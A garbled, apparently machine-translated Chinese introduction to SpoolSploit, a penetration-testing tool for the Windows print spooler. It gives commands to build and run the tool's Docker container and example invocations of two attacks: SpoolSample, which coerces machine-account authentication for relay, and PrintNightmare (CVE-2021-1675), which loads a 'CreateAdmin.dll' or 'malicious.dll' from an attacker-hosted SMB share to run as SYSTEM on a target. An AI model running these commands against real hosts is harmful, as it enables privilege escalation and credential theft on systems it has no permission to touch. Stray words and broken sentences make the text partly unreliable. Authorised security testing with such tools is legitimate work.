SpoolSploit是一款针对Windows打印后台处理程序(print spooler)安全审计工具,研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)存在的安全漏洞,并通过实际使用技术进行渗透试验或安全审计。
SpoolSploit还包装了许多其他实用工具,用于实际漏洞利用和渗透试验。
SpoolSploit还包装了许多其他实用工具,用于实际的漏洞利用和渗透测试。通过升级权限和在具有完全系统访问权限的节点上恶意执行计算机账户凭证,实现了两种方法DLL。快速开始
自项目发布之日起,SpoolSploit Docker最新版本的容器macOS、Ubuntu Linux和Windows 10成功测试。
我们建议用户在这里SpoolSploit Docker在容器中进行渗透试验或中继试验,并托管相应的DLL然后确保文件运行Docker在容器主机上打开未使用的445端口。在Windows这种情况在主机上运行时最为常见,因为默认情况下使用端口445。如果您的主机上端口445已被占用或无法使用,您可电脑 以在网桥模式下配备网络适配器的虚拟机中运行Docker容器即可。工具下载&访问SpoolSploit容器
首先,用以下命令将项目源码克隆到本地:git clone https://github.com/BeetleChunks/SpoolSploit
接下来,构建SpoolSploit Docker容器镜像:
cd SpoolSploitsudo docker build -t spoolsploit .
创建并启动SpoolSploit Docker容器:
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
绑定容器:
sudo docker exec -it spoolsploit /bin/bash
命令行使用usage: spool_sploit.py[-h]-a{spoolsample,nightmare}-rH RHOST -rP{139,445}[-lH LHOST][-lS LSHARE]-d DOMAIN -u USER -p PASSWDoptional arguments: -h, --help 显示并退出帮助信息 -a{spoolsample,nightmare}, --attack{spoolsample,nightmare}需要在目标主机上执行的测试类型 -rH RHOST, --rhost RHOST 远程目标IP、CIDR范围或文件名 (file:<path>) -rP{139,445}, --rport{139,445}远程SMB服务器端口 -lH LHOST, --lhost LHOST 监控主机名或IP地址 -lS LSHARE, --lshare LSHARE 电脑 SMB共享 (UNC) -d DOMAIN, --domain DOMAIN 身份认证域名 -u USER, --username USER 身份认证用户名 -p PASSWD, --password PASSWD 身份认证密码工机使用样例
使用样例1python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
使用样例2python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10SpoolSample - Windows获取设备账户凭证和中继
PrintNightmare (CVE-2021-1675) - 在目标Windows设备电脑上以SYSTEM恶意执行权限DLLsudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'
项目地址
SpoolSploit:https://github.com/BeetleChunks/SpoolSploit电脑